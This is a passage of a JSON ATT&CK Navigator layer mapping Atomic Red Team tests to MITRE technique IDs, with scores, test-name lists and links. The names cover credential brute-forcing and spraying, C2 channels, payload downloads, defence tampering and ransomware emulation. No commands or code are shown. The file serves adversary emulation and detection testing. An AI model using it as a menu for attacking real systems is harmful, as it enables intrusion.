Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View 